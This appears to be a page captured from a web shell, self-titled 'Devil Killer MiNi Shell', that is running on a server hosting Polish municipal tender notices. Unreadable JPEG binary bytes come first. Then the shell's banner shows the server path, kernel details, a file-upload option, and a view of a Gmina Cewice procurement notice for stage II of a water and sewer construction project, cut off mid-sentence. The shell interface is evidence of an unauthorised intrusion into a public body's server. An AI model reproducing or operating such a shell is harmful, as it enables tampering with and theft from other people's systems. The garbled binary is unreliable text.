JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210831/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210831/0016515201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa sieci wodociągowej i sieci kanalizacji sanitarnej wraz z przepompowniami ścieków w miejscowości Cewice – Etap II. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Cewice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 770979750</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">W. Witosa 16</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Cewice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-312</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">59 861-34-60</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">59 861-34-62</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@cewice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.cewice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> kierowanie podstawowymi rodzajami działalności publicznej </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa sieci wodociągowej i sieci kanalizacji sanitarnej wraz z przepompowniami ścieków w miejscowości Cewice – Etap II. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ee843ed0-0a48-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00165152</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000340/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Budowa sieci wodociągowej i sieci kanalizacyjnej wraz z przepompowniami w m. Cewice (etap II)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://cewice.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://cewice.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Korespondencja prowadzona jest za pomocą Platformy Zakupowej dostępnej pod adresem wskazanym<br/>poniżej. 4.1. zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na<br/>subdomenie Gminy Cewice;https://cewice.ezamawiajacy.pl,<br/>lubhttps://oneplace.marketplanet.pl.4.2.Wykonawca po wybraniu opcji„Przystąp do postępowania”<br/>zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o<br/>możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując<br/>kroki procesu rejestracyjnego;podaje adres e-mail, ustanawia hasło,następnie powtarza hasło, wpisuje<br/>kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”.4.3. Rejestracja Wykonawcy<br/>trwamaksymalnie do 2 dni roboczych. W związku z tym Zamawiający zaleca Wykonawcom<br/>uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty.Wykonawca wraz z<br/>potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informację, o możliwości przyspieszenia<br/>procedury założenia konta, wówczas należy skontaktować się pod numerem telefonu podanym w ww.<br/>potwierdzeniu. 4.4. Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu.<br/>Komunikacja między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje,<br/>przekazywane są przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy<br/>Zakupowej. Za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za<br/>pośrednictwem zakładki„Korespondencja”.5. Wykonawca może zwrócić się do Zamawiającego z<br/>wnioskiem o wyjaśnienie treści SWZ. Wniosek należy przesłać za pośrednictwem Platformy Zakupowej<br/>przez opcję„Zadaj pytanie” lub przy użyciu zakładki „Korespondencja”. Zamawiający informuje, iż w<br/>przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca<br/>winien skontaktować się z dostawcą rozwiązania teleinformatycznego Platforma zakupowa Gminy<br/>Cewice tel. +48 22 257 22 23(infolinia dostępna w dni robocze, w godzinach 9.00-17.00) email:<br/>oneplace@marketplanet.pl8. Zamawiający określa niezbędne wymagania sprzętowo- aplikacyjne<br/>umożliwiające pracę na Platformie Zakupowej tj.:8.1. Stały dostęp do sieci Internet ogwarantowanejprzepustowości nie mniejszej niż 512 kb/s;8.2. Komputer klasy PC lub MAC, o<br/>następującej<br/>konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS<br/>Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje;8.3. Zainstalowanadowolna przeglądarka<br/>internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer<br/>minimalnie wersja 10.0;8.4. Włączona obsługa JavaScript;8.5. Zainstalowany program Acrobat Reader<br/>lub inny obsługujący pliki w formacie .pdf.9. Zamawiający określa dopuszczalneformaty przesyłanych<br/>danych tj. plików o wielkości do 100 MB w txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx,<br/>pptx,csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip,<br/>tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC,<br/>XMLenc.10. Zamawiający określa informacje na temat kodowania i czasuodbioru danych tj.:10.1. Plik<br/>załączony przez Wykonawcę na Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako<br/>zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po<br/>odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.Zamawiający udostępnia dane osobowe, o których mowa<br/>w art. 10 rozporządzenia 2016/679, w celu umożliwienia korzystania ze środków ochrony prawnej, o<br/>których mowa w dziale IX Pzp, do upływu terminu na ich wniesienie.2. Skorzystanie przez osobę, której<br/>dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w<br/>art.16rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o<br/>udzieleniezamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie<br/>niezgodnym z ustawą.3. Zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust.<br/>1 rozporządzenia2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończeniatego<br/>postępowania.4. W przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art.<br/>18ust. 1 rozporządzenia 2016/679, spowoduje ograniczenie przetwarzania danych osobowych<br/>zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia<br/>postępowania o udzielenie zamówienia zamawiający nie udostępnia tych danych, chyba że<br/>zachodząprzesłanki, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679. 5. Ograniczenia<br/>zasady jawności, o których mowa w ust. 3 i art. 18 ust. 3-6 Pzp, stosuje się odpowiednio. 6. W<br/>przypadku korzystania przez osobę,której dane osobowe są przetwarzane przez zamawiającego, z<br/>uprawnienia, o którym mowa w art. 15ust. 1–3 rozporządzenia 2016/679, zamawiający może żądać od<br/>osobywystępującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie<br/>nazwy lub daty zakończonego postępowania o udzielenie zamówienia. 7. Skorzystanie przez osobę,<br/>której dane osobowe są przetwarzane, z uprawnienia do sprostowania lub uzupełnienia danych<br/>osobowych, októrym mowa wart. 16 rozporządzenia 2016/679, nie może naruszać integralności<br/>protokołu postępowania oraz jego załączników.8. W postępowaniu są przetwarzane dane osobowe<br/>podlegające ochronie zgodnie z przepisami ustawy z dnia 10 maja 2018 r. o ochronie danych<br/>osobowych (Dz.U.z2019 r. poz. 1781)oraz rozporządzenia 2016/679. Dane te mogą dotyczyć w<br/>szczególności samego wykonawcy (osoby fizycznej prowadzącej działalność gospodarczą), jego<br/>pełnomocnika (osoby fizycznej), jak też informacji o osobach, które w swojej ofercie wykonawca<br/>przedkłada celem wykazania spełniania warunków udziału w postępowaniu, braku podstaw do<br/>wykluczenia z postępowania, jak i potwierdzenia wymogów zamawiającego dotyczących wykonania<br/>przedmiotu zamówienia.9. W postępowaniu i po zakończeniu postępowania do przetwarzania danych<br/>osobowych osób fizycznychstosuje się przepisy ustawy z dnia 10 maja 2018 r. o ochronie danych<br/>osobowych (Dz.U. z 2019 r. poz. 1781) oraz rozporządzenia 2016/679.10. Zgodnie z art. 13 ust. 1 i 2<br/>rozporządzenia 2016/679, zamawiający informuje, że: 1) administratorem danych osobowych<br/>osóbfizycznych jest Zamawiający -Gmina Cewice ul. W. Witosa 16, 84-312 Cewice, tel.: 59 861-34-60;<br/>fax:59 861-34-62, email: sekretariat@cewice.pl, 2) Zamawiający wyznaczył Inspektora Ochrony Danych, z<br/>którym można się skontaktować Pani Monika Zygmunt-Jakuć, kontakt: iod@cewice.pl, tel.: 791-711-<br/>174,3) dane osobowe osób fizycznych przetwarzane będą na podstawie art. 6 ust. 1 lit. c<br/>rozporządzenia 2016/679 w celu związanym z postępowaniem o udzielenie zamówienia publicznego<br/>pn. Budowa systemu tras rowerowych na terenie Gminy Cewice – etap III – budowa pierwszego<br/>odcinka ścieżki rowerowej na trasie Cewice – Maszewo Lęborskie w miejscowości Cewice Oznaczenie<br/>sprawy: ZP-ZIR.271.3.2021prowadzonym przez Zamawiającego – Gminę Cewice,4) w odniesieniu do<br/>danych osobowych osób fizycznych decyzje nie będą podejmowane w sposób zautomatyzowany,<br/>stosownie do art. 22 rozporządzenia2016/679</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1.Skorzystanie przez osobę, której dane osobowe<br/>dotyczą,z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16<br/>rozporządzenia2016/679,nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.<br/>2.Zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1<br/>rozporządzenia2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego<br/>postępowania.3.W przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18<br/>ust. 1 rozporządzenia 2016/679,spowoduje ograniczenie przetwarzania danych osobowych zawartych<br/>w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania<br/>oudzielenie zamówienia zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o<br/>których mowa w art. 18 ust.2 rozporządzenia 2016/679</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-ZIR.271.26.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 2510772,36 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 1368482,89 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest robota budowlana w rozumieniu Prawa zamówień publicznych obejmująca budowę sieci wodociągowej i sieci kanalizacji sanitarnej wraz z przepompowniami ścieków w miejscowości Cewice – Etap II. Etap II nie obejmuje odcinka sieci kanalizacji sanitarnej - od studni Sistn do przepompowni PP1 (Ø200 PVC – 5 m, Ø90 PE 100 SDR17- 978 m) – wykonanej w I etapie oraz zakresu w pasie drogi wojewódzkiej (dz. nr 260 obr. Cewice). Zakres robót obejmuje:Wykonanie poniższych prac zgodnie z wielkościami określonymi w projekcie budowalnym i wykonawczym oraz specyfikacjami technicznymi, stanowiącym załącznik do postępowania: <br/>1.	Roboty w zakresie budowy sieci kanalizacyjnej w ramach II etapu obejmują:<br/>1)	Roboty przygotowawcze, ziemne.<br/>2)	Budowę sieci kanalizacji sanitarnej w tym:<br/>a.	grawitacyjna z rur PVC 200 mm o L min 1958 m;<br/>b.	grawitacyjna z rur PVC 160 mm o L min. 200,00 m do granicy posesji zaślepiona korkiem;<br/>c.	tłoczna 63 mm z rur PE100 SDR17 o L min. 14 m wykonana przewiertem;<br/>d.	przewierty zgodnie z projektem w rurach ochronnych DN 250 o L min. 123 m;<br/>e.	przewierty zgodnie z projektem w rurach ochronnych DN 315 o L min. 17 m;<br/>f.	rurociągi układać w gotowym wykopie na wyprofilowanym i zagęszczonym podłożu z piasku o gr. min 15 cm.<br/>3)	Uzbrojenie kanalizacji:<br/>a.	studnie rewizyjne betonowe o śr. wewnętrznej DN 1200 z betonu klasy C35/45 ze stopniami złazowymi żeliwnymi osadzonymi fabrycznie, zwieńczone płytą żelbetową z włazem żeliwnym – 50 kpl;<br/>b.	studnie rewizyjne DN 600 z włazem ciężkim – 2 kpl.<br/>4)	2 przepompownie (2-pompowe) – PP1 zlokalizowana na dz. nr 377, PP2 najazdowa, zlokalizowana na dz. nr 392/1 obręb Cewice. Pompownie <br/>z kompletnym wyposażeniem i uzbrojeniem, wyposażone w układ sterowania zapewniający automatyczną pracę przemienną pomp, a także w instalacje do samoczynnego zamontowania pomp przy pomocy stóp sprzęgających <br/>z prowadnicami rurowymi. Automatyka powinna pozwalać również na ręczne załączanie poszczególnych pomp, a sterowanie pracy pomp powinno być regulowane za pomocą czujników pływakowych, które sterują praca pomp <br/>w układzie. Zbiorniki przepompowni podziemne monolityczne z polimerobetonu charakteryzujące się wysoką odpornością na działanie czynników agresywnych, <br/>z włazem pozwalającym na wymianę pomp z zamknięciem ryglowanym na klucz. W przepompowni należy zamontować wentylację wywiewno-nawiewną <br/>z zastosowaniem biofiltrów redukujących emisję odorów.<br/>5)	Zagospodarowanie przepompowni:<br/>a.	teren pod przepompownię PP1 oraz rurociągi na dz. 377 obr. Cewice, przed montażem należy oczyścić z istniejących krzewów i samosiejek,<br/>b.	ogrodzenie przepompowni PP1 z paneli systemowych o wys. min. 1,8 m na słupkach stalowych na cokole betonowym, brama wjazdowa o szer. min. 3,0 m i wys. min. 1,8 m i furtka o szer. min. 1,0 m – 1 kpl; <br/>c.	oświetlenie dla każdej przepompowni, lampa typu parkowego z oprawą z wł. zmierzchowym i czujnikiem ruchu, posadowionym na prefabrykowanym fundamencie betonowym; <br/>d.	utwardzenie terenu przepompowni PP1 z kostki betonowej o gr. 8 cm <br/>na podbudowie z kruszywa łamanego o gr. 0-31.5mm;<br/>e.	na terenie przepompowni PP1 należy zainstalować szafę sterowniczą <br/>i podstawę żurawika;<br/>f.	na terenie przepompowni PP2 należy zainstalować: szafkę sterowniczą;<br/>g.	wykonanie zasilania energetycznego dla każdej przepompowni zgodnie <br/>z projektem budowlanym branży elektrycznej. <br/>6)	W miejscu występującej kolizji uzbrojenia podziemnego, w tym sieci elektroenergetycznych, telekomunikacyjnych, światłowodowych należy zachować szczególną ostrożność i roboty ziemne prowadzić ręcznie. <br/>7)	Po wybudowaniu sieci kanalizacyjnej należy odtworzyć nawierzchnię dróg.<br/>8)	Wykonanie przeglądu wybudowanej kanalizacji grawitacyjnej za pomocą kamery wraz z pomiarem spadków i wykonaniem wykresu profili podłużnych.<br/>9)	Wytyczenie i inwentaryzacja geodezyjna sieci kanalizacji sanitarnej.<br/>2.	Roboty w zakresie budowy instalacji zewnętrznej kanalizacji sanitarnej na dz. nr 375/1 obręb Cewice:<br/>1)	Roboty przygotowawcze, ziemne.<br/>2)	Budowa zewnętrznej instalacji kanalizacji sanitarnej z rur PVC 160 mm o długości min. 28,1 m, o klasie sztywności nie mniejszej niż SN8.<br/>3)	Budowa studni rewizyjnych z kręgów betonowych o śr. 1200 mm, z betonu kl. C35/45, przykrytych włazem żeliwno-betonowym o klasie obciążenia D 400 kN – 3 szt.<br/>4)	Wytyczenie i inwentaryzacja geodezyjna instalacji kanalizacji sanitarnej.<br/>3.	Roboty w zakresie budowy sieci wodociągowej w ramach II etapu obejmują:<br/>1)	Roboty przygotowawcze, ziemne.<br/>2)	Budowę sieci wodociągowej:<br/>a) z rur PE o średnicy 110 mm, SDR 17, PN10 o długości min. 1099,0 m.<br/>3)	Na odcinkach wskazanych w projekcie budowlanym, w miejscach kolizji <br/>z istniejącym układem drogowym, należy sieć wodociągową zabezpieczyć rurą ochronną PE o średnicy 225 mm o dł. min. 33 m.<br/>4)	Projektowane sieci biegnące przez działki prywatne należy ułożyć metodą bezwykopową. Sieć wodociągową należy wykonać przewiertem sterowanym zgodnie z projektem budowlanym.<br/>5)	Uzbrojenie sieci wodociągowej stanowić będą hydranty technologiczne naziemne HP 80mm, zasuwy żeliwne kołnierzowe z obudową Ø100 (min. 4 szt.), zasuwy kołnierzowe z żeliwa sferoidalnego z obudową o Ø80 (min. 8 szt.). <br/>6)	Rurociągi układać w gotowym wykopie na wyprofilowanym i zagęszczonym podłożu z piasku.<br/>7)	W miejscu występującej kolizji uzbrojenia podziemnego, w tym sieci elektroenergetycznych, telekomunikacyjnych, światłowodowych należy zachować szczególną ostrożność i roboty ziemne prowadzić ręcznie. <br/>8)	Po wybudowaniu sieci wodociągowej należy przywrócić nawierzchnię do stanu pierwotnego.<br/>9)	Likwidacja istniejącego odcinka sieci wodociągowej, w miejscu wskazanym <br/>w projekcie budowlanym. <br/>10)	Wytyczenie i inwentaryzacja geodezyjna sieci wodociągowej.<br/>Szczegółowy opis przedmiotu zamówienia stanowią załączniki:<br/><br/>1.	Dokumentacja projektowa. <br/>2.	Badania geotechniczne.<br/>3.	Przedmiar robót.<br/>4.	Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych (STWiORB).<br/><br/>W przypadku wątpliwości interpretacyjnych co do zakresu robót obowiązuje następująca kolejność n/w dokumentów:<br/>1. dokumentacja projektowa<br/>2. STWiORB<br/>3. przedmiar robót<br/><br/>Informacje dotyczące przeprowadzenia wizji lokalnej w terenie<br/>Zamawiający nie wymaga przeprowadzenia wizji lokalnej w terenie ani zapoznania się z dokumentacją projektową w siedzibie Zamawiającego.<br/><br/>Informacje pozostałe<br/>1.	W przypadku rozbieżności pomiędzy dokumentacją projektową, a przedmiarem w pierwszej kolejności rozpatrywać należy zapisy dokumentacji projektowej, a następnie przedmiaru robót.<br/>2.	Wykonawca, który powołuje się na rozwiązanie równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać na etapie składania oferty, że oferowane przez niego roboty, materiały, itp. spełniają wymagania określone przez Zamawiającego w odniesieniu do przedmiotu zamówienia. Zamawiający oceniając równoważność będzie kierował się takimi elementami, jak funkcjonalność i wytrzymałość, które w zaproponowanych rozwiązaniach równoważnych nie powinny być mniejsze od opisanych w dokumentach postępowania dla danego rozwiązania, materiału, czy funkcji. Dokumenty mające na celu wykazanie równoważności stanowią element oferty opisujący oferowany przedmiot, a zatem nie podlegają uzupełnieniu. Opis zaproponowanych rozwiązań równoważnych powinien być na tyle szczegółowy, żeby Zamawiający przy ocenie ofert mógł ocenić spełnienie wymagań dotyczących ich parametrów technicznych oraz rozstrzygnąć, czy zaproponowane rozwiązania są równoważne.<br/>3.	Zamawiający wymaga aby Wykonawca udzielił na wykonany przedmiot zamówienia co najmniej 36 miesięcy rękojmi za wady i 36 miesięcy gwarancji jakościowej. Zrównuje się oba okresy. Jednocześnie wydłużenie tych okresów jest możliwe. W 